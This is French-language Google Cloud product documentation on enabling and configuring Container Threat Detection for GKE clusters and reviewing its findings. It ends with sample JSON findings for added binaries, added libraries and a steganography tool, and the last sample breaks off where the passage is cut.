Cette page explique comment examiner les résultats de Container Threat Detection dans la console Google Cloud et comprend des exemples de résultats de Container Threat Detection.
Container Threat Detection est un service intégré aux niveaux Premium et Enterprise de Security Command Center.
Pour afficher les résultats de Container Threat Detection, le service doit être activé dans les paramètres Services de Security Command Center.
Pour en savoir plus sur l'affichage et la gestion des résultats de Container Threat Detection, consultez la section Examiner les résultats sur cette page.
Pour activer Container Threat Detection et d'autres détecteurs de niveau Premium au niveau du projet, consultez Activer Security Command Center pour un projet. Le forfait Enterprise n'est pas compatible avec les activations au niveau du projet.
Utiliser une version de GKE compatible
Pour détecter les menaces potentielles pour vos conteneurs, vous devez vous assurer que vos clusters se trouvent dans une version compatible de Google Kubernetes Engine (GKE). Container Threat Detection est compatible avec les versions GKE suivantes pour les clusters x86 basés sur Container-Optimized OS sur les canaux stables, standards et rapides :
- GKE Standard >= 1.15.9-gke.12
- GKE Standard >= 1.16.5-gke.2
- GKE Standard >= 1.17
- GKE Standard >= 1.18.10-gke.1400
- GKE Standard >= 1.19.2-gke.2000
- GKE Standard >= 1.20
- GKE Standard >= 1.21
- GKE Autopilot >= 1.21.11-gke.900
- GKE Standard et Autopilot >= 1.22
- GKE Standard et Autopilot >= 1.23
Container Threat Detection est compatible avec les versions GKE suivantes pour les clusters x86 basés sur Ubuntu sur les canaux stable, standard et rapide :
- GKE Standard et Autopilot >= 1.28.15-gke.1480000
- GKE Standard et Autopilot >= 1.29.12-gke.1120000
- GKE Standard et Autopilot >= 1.30.8-gke.1128000
- GKE Standard et Autopilot >= 1.31.4-gke.1177000
Container Threat Detection est compatible avec les versions GKE suivantes pour les clusters Arm basés sur Container-Optimized OS sur les canaux stables, standards et rapides :
- GKE Standard et Autopilot >= 1.28
Container Threat Detection est uniquement compatible avec les images de nœuds Container-Optimized OS.
Activer Container Threat Detection
Lorsque vous activez le niveau Premium ou Enterprise de Security Command Center, Container Threat Detection est activé par défaut, sauf si vous choisissez de le désactiver lors du processus d'activation.
Si vous devez activer ou désactiver Container Threat Detection pour votre organisation ou votre projet, vous pouvez le faire sur la page Paramètres de Security Command Center. Pour en savoir plus, consultez Activer ou désactiver un service intégré.
Lorsque vous activez Container Threat Detection, soit en activant Security Command Center, soit plus tard, procédez comme suit :
- Pour tous les clusters qui ne sont pas sur une version compatible de GKE, suivez les étapes du guide pour mettre à jour un cluster.
- Assurez-vous que vos clusters disposent de suffisamment de ressources disponibles pour exécuter le DaemonSet de Container Threat Detection.
- Dans la console Google Cloud , examinez les paramètres d'activation du service Container Threat Detection pour vous assurer qu'il est activé pour vos clusters.
Autorisations IAM requises
Container Threat Detection nécessite une autorisation pour s'activer et se désactiver, et pour gérer l'agent Container Threat Detection sur les clusters GKE.
Pour accorder l'autorisation requise, le rôle IAM Agent de service Container Threat Detection (roles/containerthreatdetection.serviceAgent) doit être attribué à l'agent de service Container Threat Detection, qui est un type de compte de service.
La suppression de ce rôle par défaut de l'agent de service peut empêcher le fonctionnement correct de Container Threat Detection.
Selon la façon dont Security Command Center a été activé et le moment où il l'a été, le nom de l'agent de service utilisé par Container Threat Detection est différent :
Si Security Command Center a été activé avant le 7 décembre 2023, Container Threat Detection utilise l'agent de service géré par l'utilisateur suivant :
service-PROJECT_NUMBER@gcp-sa-ktd-control.iam.gserviceaccount.comSi Security Command Center a été activé au niveau de l'organisation après le 7 décembre 2023, Container Threat Detection utilise l'agent de service suivant géré par l'utilisateur au niveau de l'organisation :
service-org-ORGANIZATION_ID@gcp-sa-ktd-hpsa.iam.gserviceaccount.comSi Security Command Center a été activé au niveau du projet après le 7 décembre 2023, Container Threat Detection utilise l'agent de service suivant géré par l'utilisateur au niveau de l'organisation :
service-project-PROJECT_NUMBER@gcp-sa-ktd-hpsa.iam.gserviceaccount.com
Pour en savoir plus sur les agents de service et les rôles IAM, consultez les pages suivantes :
Autorisations requises pour le compte de service de nœud GKE personnalisé
Lorsque vous utilisez un compte de service personnalisé pour vos nœuds GKE, le nouveau compte de service de nœud doit disposer des autorisations nécessaires pour interagir avec Container Threat Detection.
Pour accorder ces autorisations au compte de service, attribuez-lui le rôle Créateur de jetons du compte de service (roles/iam.serviceAccountTokenCreator).
Attribuez le rôle de créateur de jetons du compte de service au compte de service de nœud :
gcloud iam service-accounts add-iam-policy-binding \ SERVICE_ACCOUNT_NAME \ --member=serviceAccount:service-PROJECT_NUMBER@compute-system.iam.gserviceaccount.com \ --role=roles/iam.serviceAccountTokenCreatorRemplacez les valeurs suivantes :
- Remplacez SERVICE_ACCOUNT_NAME par l'adresse e-mail de votre nouveau compte de service de nœud.
- Remplacez PROJECT_NUMBER par le numéro du projet dans lequel la détection des menaces liées aux conteneurs est déployée. C'est essentiel si le projet est différent de celui du compte de service.
Activez l'API Container Threat Detection dans le même projet que celui où le nouveau compte de service de nœud a été créé :
gcloud services enable containerthreatdetection.googleapis.com --project PROJECT_IDRemplacez PROJECT_ID par l'ID du projet dans lequel réside le nouveau compte de service de nœud.
Vérifier la configuration du cluster GKE
Pour que Container Threat Detection fonctionne, si votre cluster se trouve dans un cloud privé virtuel (VPC), son réseau doit répondre aux exigences de routage, de pare-feu et de DNS pour communiquer avec les API Google et services. Pour accéder aux API Google, consultez les guides suivants:
- Si votre cluster est un cluster privé, consultez la page Configurer l'accès privé à Google ou Configurer Private Service Connect.
- Si votre cluster se trouve dans un périmètre de service VPC Service Controls, assurez-vous de suivre les instructions de la présentation des périmètres de service.
- Si votre cluster n'est pas un cluster privé, consultez la section Accéder aux API à partir de VM avec des adresses IP externes.
En outre, la configuration de votre cluster GKE ou les contraintes liées aux règles d'organisation ne doivent pas empêcher la création ni l'utilisation des objets dont Container Threat Detection a besoin pour fonctionner. Les sections suivantes incluent une liste d'objets GKE créés par Container Threat Detection et expliquent comment configurer les composants GKE essentiels pour utiliser Container Threat Detection.
Objets Kubernetes
Après l'intégration, Container Threat Detection crée plusieurs objets GKE dans vos clusters activés. Les objets servent à surveiller les images de conteneurs, à gérer les conteneurs et les pods privilégiés, et à évaluer l'état pour générer des résultats. Le tableau suivant répertorie les objets, leurs propriétés et les fonctions essentielles.
| Objet | Name (Nom)1 | Propriétés | Fonction |
|---|---|---|---|
| ClusterRole | container-watcher-pod-reader |
Accorde les autorisations get, watch et list sur les pods |
|
| ClusterRole | pod-reader |
Accorde les autorisations get, watch et list sur les pods |
|
| ClusterRoleBinding |
|
Attribue les rôles container-watcher-pod-reader et gce:podsecuritypolicy:privileged au compte de service container-watcher-pod-reader
|
|
| CustomResourceDefinition | containerwatcherstatuses.containerthreatdetection.googleapis.com |
Rapports sur l'état des DaemonSet | |
| DaemonSet | container-watcher2 |
Privilégié | Interactions avec le module de noyau basé sur eBPF et le moteur de conteneur |
| Installe /host/ en lecture et écriture | Communication avec le module de noyau basé sur eBPF | ||
Installe /etc/container-watcher/secrets en lecture seule pour accéder à container-watcher-token |
Authentification | ||
Utilise hostNetwork |
Génération de résultats | ||
| Image gke.gcr.io/watcher-daemonset |
Activation et mise à niveau | ||
| Backend containerthreatdetection-REGION.googleapis.com:443 |
Génération de résultats | ||
| Rôle | container-watcher-status-reporter |
Rôle avec les verbes get, list, watch, create, update et patch pour la CustomResourceDefinition containerwatcherstatuses.containerthreatdetection.googleapis.com |
Permet de mettre à jour les informations sur l'état des DaemonSets |
| RoleBinding | gce:podsecuritypolicy:container-watcher |
Accorde le rôle gce:podsecuritypolicy:privileged au compte de service container-watcher-pod-reader |
Conserve les fonctionnalités lorsque PodSecurityPolicy est activé |
container-watcher-status-reporter |
Accorde le rôle container-watcher-status-reporter au compte de service container-watcher-pod-reader |
||
| Secret | container-watcher-token |
Authentification | |
| ServiceAccount | container-watcher-pod-reader |
Activation, mise à niveau et désactivation |
1 Tous les objets se trouvent dans l'espace de noms kube-system, à l'exception de
container-watcher-pod-reader et gce:podsecuritypolicy:container-watcher.
2 Lors de l'installation, de la mise à jour ou de la suppression de Container Threat Detection, Kubernetes peut générer des messages d'erreur pour les objets Kubernetes ou d'autres dépendances qui sont momentanément manquantes ou incomplètes. Par exemple, il peut arriver que le rôle container-watcher-pod-reader soit manquant, ce qui empêche l'installation de l'observateur de pods. Cela génère également des journaux d'erreurs tels que serviceaccount "container-watcher-pod-reader" not found.
En règle générale, ces erreurs se résolvent automatiquement une fois que la détection des menaces dans les conteneurs a terminé le processus. Sauf si les erreurs persistent au-delà de quelques minutes, vous pouvez les ignorer sans risque.
PodSecurityPolicy et contrôleurs d'admission
Une règle PodSecurityPolicy est une ressource de contrôleur d'admission que vous configurez et qui valide les requêtes de création ou de mise à jour de pod sur votre cluster. Container Threat Detection est compatible avec les règles PodSecurityPolicy qui sont automatiquement appliquées lors de la création ou de la mise à jour d'un cluster avec l'option enable-pod-security-policy. Plus précisément, Container Threat Detection utilise la règle gce.privileged lorsque PodSecurityPolicy est activé.
Si vous utilisez des règles PodSecurityPolicy personnalisées ou d'autres contrôleurs d'admission, ils ne doivent pas empêcher la création ni l'utilisation des objets dont Container Threat Detection a besoin pour fonctionner. Par exemple, un contrôleur d'admission basé sur un webhook qui refuse ou ignore les déploiements privilégiés peut empêcher le fonctionnement correct de Container Threat Detection.
Pour en savoir plus, consultez la page Utiliser des règles de sécurité des pods.
Exclure les variables d'environnement des résultats de Container Threat Detection
Par défaut, lorsque Container Threat Detection génère un résultat, il signale les variables d'environnement pour tous les processus référencés dans le résultat. Les valeurs des variables d'environnement peuvent être importantes lors de l'examen d'une attaque. Toutefois, certains packages logiciels stockent des secrets et d'autres informations sensibles dans des variables d'environnement. Pour empêcher Container Threat Detection d'inclure des variables d'environnement de processus dans les résultats Container Threat Detection, désactivez le module REPORT_ENVIRONMENT_VARIABLES à l'aide de la Google Cloud CLI ou de la méthode securityCenterServices.patch de l'API Security Command Center Management au niveau de l'organisation, du dossier ou du projet.
Par exemple, pour désactiver le signalement des variable d'environnement dans un projet, créez un fichier nommé module_config.yaml avec le contenu suivant :
REPORT_ENVIRONMENT_VARIABLES:
intendedEnablementState: DISABLED
Exécutez ensuite la commande suivante :
gcloud scc manage services update container-threat-detection \
--module-config-file=module_config.yaml \
--project=PROJECT_ID
Pour restaurer le comportement par défaut, modifiez module_config.yaml afin qu'il contienne les éléments suivants, puis exécutez à nouveau la commande :
REPORT_ENVIRONMENT_VARIABLES:
intendedEnablementState: ENABLED
Pour afficher toutes les commandes gcloud CLI permettant de gérer les services, consultez gcloud scc manage services.
Exclure les arguments de ligne de commande des résultats Container Threat Detection
Tous les processus comportent un ou plusieurs arguments de ligne de commande (CLI). Par défaut, lorsque Container Threat Detection inclut des détails sur le processus dans un résultat, il enregistre les arguments CLI du processus. Les valeurs des arguments de CLI peuvent être importantes lors de l'analyse d'une attaque. Toutefois, certains utilisateurs peuvent transmettre des secrets et d'autres informations sensibles dans les arguments de la CLI. Pour empêcher Container Threat Detection d'inclure les arguments de ligne de commande des processus dans les résultats Container Threat Detection, désactivez le module REPORT_CLI_ARGUMENTS à l'aide de la CLI Google Cloud ou de la méthode securityCenterServices.patch de l'API Security Command Center Management au niveau de l'organisation, du dossier ou du projet.
Par exemple, pour désactiver le signalement des arguments de CLI dans un projet, créez un fichier nommé module_config.yaml avec le contenu suivant :
REPORT_CLI_ARGUMENTS:
intendedEnablementState: DISABLED
Exécutez ensuite la commande suivante :
gcloud scc manage services update container-threat-detection \
--module-config-file=module_config.yaml \
--project=PROJECT_ID
Pour restaurer le comportement par défaut, modifiez module_config.yaml afin qu'il contienne les éléments suivants, puis exécutez à nouveau la commande :
REPORT_CLI_ARGUMENTS:
intendedEnablementState: ENABLED
Pour afficher toutes les commandes gcloud CLI permettant de gérer les services, consultez gcloud scc manage services.
Utilisation des ressources
Container Threat Detection est conçu pour ne pas être intrusif dans vos clusters et devrait avoir un impact négligeable sur les performances de vos opérations de cluster.
Votre utilisation des ressources dépend de votre charge de travail. Toutefois, les composants principaux de Container Threat Detection (le DaemonSet de l'espace utilisateur et ses programmes eBPF) ont un impact estimé sur les performances d'un maximum de 0,125 processeur virtuel et 450 Mo de mémoire, en fonction des limites strictes définies pour restreindre l'utilisation des ressources. Nous réévaluons parfois ces limites et pouvons les modifier à l'avenir pour optimiser les performances, en particulier pour les nœuds très volumineux.
Si vous êtes un client BigQuery, vous pouvez activer la mesure de l'utilisation de GKE pour surveiller l'utilisation des ressources du DaemonSet de l'espace utilisateur de Container Threat Detection. Pour afficher le DaemonSet de l'espace utilisateur dans la mesure de l'utilisation, recherchez l'espace de noms kube-system et le libellé k8s-app=container-watcher.
La mesure de l'utilisation de GKE ne peut pas suivre l'utilisation du processeur spécifiquement pour le module de noyau basé sur eBPF. Ces données sont incluses dans l'utilisation globale du processeur.
API Container Threat Detection
Container Threat Detection active automatiquement l'API containerthreatdetection lors de l'intégration pour permettre la génération de résultats. Vous ne devez pas interagir directement avec cette API requise. La désactivation de cette API affecte la capacité de Container Threat Detection à générer de nouveaux résultats. Si vous souhaitez ne plus recevoir les résultats de Container Threat Detection, désactivez l'application dans les paramètres Services de Security Command Center.
Examiner les résultats
Lorsque Container Threat Detection génère des résultats, vous pouvez les afficher dans Security Command Center. Si vous avez configuré l'exportation de journaux vers Cloud Logging, vous pouvez également afficher les résultats dans Cloud Logging. Pour générer un résultat et vérifier votre configuration, vous pouvez déclencher intentionnellement un détecteur et tester Container Threat Detection.
Container Threat Detection présente les latences suivantes :
- Latence d'activation de 3,5 heures pour les organisations ou projets nouvellement ajoutés.
- Latence d'activation de plusieurs minutes pour les clusters nouvellement créés.
- Latence de détection de plusieurs minutes pour les menaces dans les clusters qui ont été activés
Examiner les résultats dans la console Google Cloud
Les rôles IAM pour Security Command Center peuvent être accordés au niveau de l'organisation, du dossier ou du projet. Votre capacité à afficher, modifier, créer ou mettre à jour les résultats, les éléments et les sources de sécurité dépend du niveau pour lequel vous disposez d'un accès. Pour en savoir plus sur les rôles Security Command Center, consultez la page Contrôle des accès.
Pour examiner les résultats de Container Threat Detection dans Security Command Center, procédez comme suit.
Standard ou Premium
- Dans la console Google Cloud , accédez à la page Résultats de Security Command Center.
- Sélectionnez votre projet Google Cloud ou votre organisation.
- Dans la sous-section Nom à afficher pour la source de la section Filtres rapides, sélectionnez Container Threat Detection. Les résultats de la requête de résultats sont mis à jour pour n'afficher que les résultats provenant de cette source.
- Pour afficher les détails d'un résultat spécifique, cliquez sur son nom dans la colonne Catégorie. Le panneau de détails du résultat s'ouvre et affiche l'onglet Résumé.
- Dans l'onglet Récapitulatif, examinez les détails du résultat, y compris les informations sur ce qui a été détecté, la ressource concernée et, le cas échéant, les étapes à suivre pour corriger le résultat.
- Facultatif : Pour afficher la définition JSON complète du résultat, cliquez sur l'onglet JSON.
Entreprise
- Dans la console Google Cloud , accédez à la page Résultats de Security Command Center.
- Sélectionnez votre Google Cloud organisation.
- Dans la section Aggregations (Agrégations), cliquez pour développer la sous-section Source Display Name (Nom à afficher de la source).
- Sélectionnez Container Threat Detection. Les résultats de la requête de résultats sont mis à jour pour n'afficher que les résultats provenant de cette source.
- Pour afficher les détails d'un résultat spécifique, cliquez sur son nom dans la colonne Catégorie. Le panneau de détails du résultat s'ouvre et affiche l'onglet Résumé.
- Dans l'onglet Récapitulatif, examinez les détails du résultat, y compris les informations sur ce qui a été détecté, la ressource concernée et, le cas échéant, les étapes à suivre pour corriger le résultat.
- Facultatif : Pour afficher la définition JSON complète du résultat, cliquez sur l'onglet JSON.
Pour faciliter votre enquête, les résultats de la détection de menaces contiennent également des liens vers les ressources externes suivantes :
- Entrées du framework MITRE ATT&CK. Le framework décrit les techniques d'attaque contre les ressources cloud et fournit des conseils pour s'en protéger.
- VirusTotal, un service appartenant à Alphabet qui fournit du contexte sur les fichiers, scripts, URL et domaines potentiellement malveillants.
Pour obtenir la liste des résultats de Container Threat Detection, consultez la section Détecteurs de Container Threat Detection.
Afficher les résultats dans Cloud Logging
Pour afficher les résultats de Container Threat Detection dans Cloud Logging, procédez comme suit :
Accédez à l'explorateur de journaux dans la console Google Cloud .
Sélectionnez le projet Google Cloud ou une autre ressource Google Cloud dans lequel vous stockez vos journaux Event Threat Detection.
Utilisez le volet Requête pour créer votre requête de l'une des manières suivantes :
- Dans la liste Toutes les ressources, procédez comme suit :
- Sélectionnez Threat Detector pour afficher la liste de tous les détecteurs.
- Pour afficher les résultats de tous les détecteurs, sélectionnez all detector_name. Pour afficher les résultats d'un détecteur spécifique, sélectionnez le nom de ce détecteur.
- Cliquez sur Appliquer. La table Résultats de la requête est mise à jour avec les journaux que vous avez sélectionnés.
Saisissez la requête suivante dans l'éditeur de requête, puis cliquez sur Exécuter la requête :
resource.type="threat_detector"
La table Résultats de la requête est mise à jour avec les journaux que vous avez sélectionnés.
- Dans la liste Toutes les ressources, procédez comme suit :
Pour afficher un journal, sélectionnez une ligne du tableau, puis cliquez sur Développer les champs imbriqués.
Vous pouvez créer des requêtes de journaux avancées pour spécifier un ensemble d'entrées de journal à partir d'un nombre quelconque de journaux.
Exemples de formats de résultat
Cette section inclut les formats JSON des résultats de Container Threat Detection.
Ces exemples contiennent les champs les plus courants de tous les résultats. Cependant, tous les champs peuvent ne pas apparaître dans tous les résultats. Le résultat réel dépend de la configuration d'une ressource ainsi que du type et de l'état des résultats. Les informations provenant de Kubernetes et de containerd sont fournies au mieux et ne sont pas garanties.
Pour en savoir plus sur les champs de chaque résultat, consultez les descriptions des champs dans Ressource : Résultat.
Fichier binaire ajouté exécuté
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "state": "ACTIVE", "category": "Added Binary Executed", "sourceProperties": { "VM_Instance_Name": "INSTANCE_ID", "Added_Binary_Kind": "Added", "Container_Image_Id": "CONTAINER_IMAGE_ID", "Container_Name": "CONTAINER_NAME", "Parent_Pid": 1.0, "Container_Image_Uri": "CONTAINER_IMAGE_URI", "Process_Creation_Timestamp": { "seconds": 1.617989997E9, "nanos": 1.17396995E8 }, "Pid": 53.0, "Pod_Namespace": "default", "Process_Binary_Fullpath": "BINARY_PATH", "Process_Arguments": ["BINARY_PATH"], "Pod_Name": "POD_NAME", "description": "A binary that was not part of the original container image was executed. If an added binary is executed by an attacker, this is a possible sign that an attacker has control of the workload and they are executing arbitrary commands.", "Environment_Variables": ["KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT", "KUBERNETES_SERVICE_PORT\u003d443", "HOSTNAME\u003dreconnect- test-4af235e12be6f9d9", "HOME\u003d/root", "KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS", "PATH\u003d/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", "KUBERNETES_PORT_443_TCP_PORT\u003d443", "KUBERNETES_PORT_443_TCP_PROTO\u003dtcp", "DEBIAN_FRONTEND\u003dnoninteractive", "KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT", "KUBERNETES_SERVICE_PORT_HTTPS\u003d443", "KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS", "PWD\u003d/"], "Container_Creation_Timestamp": { "seconds": 1.617989918E9, "nanos": 0.0 } }, "securityMarks": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks" }, "eventTime": "2021-04-09T17:39:57.527Z", "createTime": "2021-04-09T17:39:57.625Z", "propertyDataTypes": { "Container_Image_Id": { "primitiveDataType": "STRING" }, "Pod_Namespace": { "primitiveDataType": "STRING" }, "Container_Creation_Timestamp": { "dataType": "TIMESTAMP", "structValue": { "fields": { "seconds": { "primitiveDataType": "NUMBER" }, "nanos": { "primitiveDataType": "NUMBER" } } } }, "Environment_Variables": { "listValues": { "propertyDataTypes": [{ "primitiveDataType": "STRING" }] } }, "Added_Binary_Kind": { "primitiveDataType": "STRING" }, "description": { "primitiveDataType": "STRING" }, "Pid": { "primitiveDataType": "NUMBER" }, "Process_Arguments": { "listValues": { "propertyDataTypes": [{ "primitiveDataType": "STRING" }] } }, "Container_Image_Uri": { "primitiveDataType": "STRING" }, "Pod_Name": { "primitiveDataType": "STRING" }, "Process_Creation_Timestamp": { "dataType": "TIMESTAMP", "structValue": { "fields": { "seconds": { "primitiveDataType": "NUMBER" }, "nanos": { "primitiveDataType": "NUMBER" } } } }, "Parent_Pid": { "primitiveDataType": "NUMBER" }, "VM_Instance_Name": { "primitiveDataType": "STRING" }, "Container_Name": { "primitiveDataType": "STRING" }, "Process_Binary_Fullpath": { "primitiveDataType": "STRING" } }, "severity": "LOW", "workflowState": "NEW", "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID" }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "projectDisplayName": "PROJECT_ID", "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "parentDisplayName": "PROJECT_ID", "type": "google.container.Cluster" } }
Ajout de bibliothèque chargée
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findingsFINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "state": "ACTIVE", "category": "Added Library Loaded", "sourceProperties": { "Process_Arguments": ["BINARY_PATH", "ADDED_LIBRARY_NAME"], "Parent_Pid": 1.0, "Container_Name": "CONTAINER_NAME", "Added_Library_Fullpath": "ADDED_LIBRARY_PATH", "Container_Image_Id": "CONTAINER_IMAGE_ID", "Container_Creation_Timestamp": { "seconds": 1.618004144E9, "nanos": 0.0 }, "Pod_Name": "POD_NAME", "Pid": 7.0, "description": "A library that was not part of the original container image was loaded. If an added library is loaded, this is a possible sign that an attacker has control of the workload and they are executing arbitrary code.", "VM_Instance_Name": "INSTANCE_ID", "Pod_Namespace": "default", "Environment_Variables": ["KUBERNETES_SERVICE_PORT\u003d443", "KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT", "HOSTNAME\u003dsuspicious- library", "LD_LIBRARY_PATH\u003d/tmp", "PORT\u003d8080", "HOME\u003d/root", "PYTHONUNBUFFERED\u003d1", "KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS", "PATH\u003d/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/p ython3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" , "KUBERNETES_PORT_443_TCP_PORT\u003d443", "KUBERNETES_PORT_443_TCP_PROTO\u003dtcp", "LANG\u003dC.UTF-8", "DEBIAN_FRONTEND\u003dnoninteractive", "KUBERNETES_SERVICE_PORT_HTTPS\u003d443", "KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT", "KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS", "PWD\u003d/home/vmagent/app"], "Process_Binary_Fullpath": "BINARY_PATH", "Added_Library_Kind": "Added", "Container_Image_Uri": "CONTAINER_IMAGE_uri" }, "securityMarks": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks" }, "eventTime": "2021-04-09T21:36:13.069Z", "createTime": "2021-04-09T21:36:13.267Z", "propertyDataTypes": { "Container_Image_Id": { "primitiveDataType": "STRING" }, "Added_Library_Fullpath": { "primitiveDataType": "STRING" }, "Container_Creation_Timestamp": { "dataType": "TIMESTAMP", "structValue": { "fields": { "seconds": { "primitiveDataType": "NUMBER" }, "nanos": { "primitiveDataType": "NUMBER" } } } }, "Pod_Namespace": { "primitiveDataType": "STRING" }, "Environment_Variables": { "listValues": { "propertyDataTypes": [{ "primitiveDataType": "STRING" }] } }, "description": { "primitiveDataType": "STRING" }, "Process_Arguments": { "listValues": { "propertyDataTypes": [{ "primitiveDataType": "STRING" }] } }, "Pid": { "primitiveDataType": "NUMBER" }, "Container_Image_Uri": { "primitiveDataType": "STRING" }, "Pod_Name": { "primitiveDataType": "STRING" }, "Added_Library_Kind": { "primitiveDataType": "STRING" }, "Parent_Pid": { "primitiveDataType": "NUMBER" }, "VM_Instance_Name": { "primitiveDataType": "STRING" }, "Container_Name": { "primitiveDataType": "STRING" }, "Process_Binary_Fullpath": { "primitiveDataType": "STRING" } }, "severity": "LOW", "workflowState": "NEW", "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID" }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "projectDisplayName": "PROJECT_ID", "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "parentDisplayName": "PROJECT_ID", "type": "google.container.Cluster" } }
Commande et contrôle : outil de stéganographie détecté (aperçu)
{ "finding": { "access": {}, "application": {}, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Command and Control: Steganography Tool Detected", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2024-06-17T18:50:13Z" } ], "createTime": "2025-01-21T19:55:22.017Z", "database": {}, "eventTime": "2025-01-21T19:55:21.762Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd", "indicator": {}, "kernelRootkit": {}, "kubernetes": { "pods": [ { "name": "CONTAINER_NAME", "ns": "NAMESPACE", "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2025-01-21T19:55:19Z" } ] } ], "nodes": [ { "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID" } ] }, "logEntries": [ { "cloudLoggingEntry": { "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": "2025-01-21T19:55:19.654640277Z" } } ], "mitreAttack": { "primaryTactic": "COMMAND_AND_CONTROL", "primaryTechniques": [ "DATA_OBFUSCATION" ], "additionalTactics": [ "DEFENSE_EVASION" ], "additionalTechniques": [ "OBFUSCATED_FILES_OR_INFO" ] }, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "muteUpdateTime": "1970-01-01T00:00:00Z", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global", "parentDisplayName": "Container Threat Detection", "processes": [ { "binary": { "path": "INTERPRETER", "size": "147176", "sha256": "INTERPRETER_SHA_256", "hashedSize": "147176", "partiallyHashed": false, "diskPath": {} }, "script": { "size": "0", "hashedSize": "0", "partiallyHashed": false, "diskPath": {} }, "args": [ "INTERPRETER", "ARG" ], "argumentsTruncated": false, "envVariables": [ { "name": "\"KUBERNETES_SERVICE_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT\"", "val": "\"tcp://34.118.224.1:443\"" }, { "name": "\"HOSTNAME\"", "val": "\"ktd-test-steganography-tool-ba379a7c2168db11\"" }, { "name": "\"HOME\"", "val": "\"/root\"" }, { "name": "\"GPG_KEY\"", "val": "\"7169605F62C751356D054A26A821E680E5FA6305\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"", "val": "\"34.118.224.1\"" }, { "name": "\"PATH\"", "val": "\"/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"", "val": "\"tcp\"" }, { "name": "\"LANG\"", "val": "\"C.UTF-8\"" }, { "name": "\"PYTHON_VERSION\"", "val": "\"3.12.6\"" }, { "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP\"", "val": "\"tcp://34.118.224.1:443\"" }, { "name": "\"KUBERNETES_SERVICE_HOST\"", "val": "\"34.118.224.1\"" }, { "name": "\"PWD\"", "val": "\"/\"" } ], "pid": "9", "parentPid": "1" } ], "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "securityPosture": {}, "severity": "CRITICAL", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "displayName": "CLUSTER_ID", "type": "google.container.Cluster", "cloudProvider": "GOOGLE_CLOUD_PLATFORM", "service": "container.googleapis.com", "location": "ZONE", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "parentDisplayName": "PROJECT_ID", "folders": [ { "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "resourceFolderDisplayName": "FOLDER_ID" } ], "organization": "organizations/ORGANIZATION_ID" }, "resourcePath": { "nodes": [ { "nodeType": "GCP_PROJECT", "id": "projects/PROJECT_ID", "displayName": "PROJECT_ID" }, { "nodeType": "GCP_FOLDER", "id": "folders/FOLDER_NUMBER", "displayName": "FOLDER_ID" }, { "nodeType": "GCP_ORGANIZATION", "id": "organizations/ORGANIZATION_ID" } ] 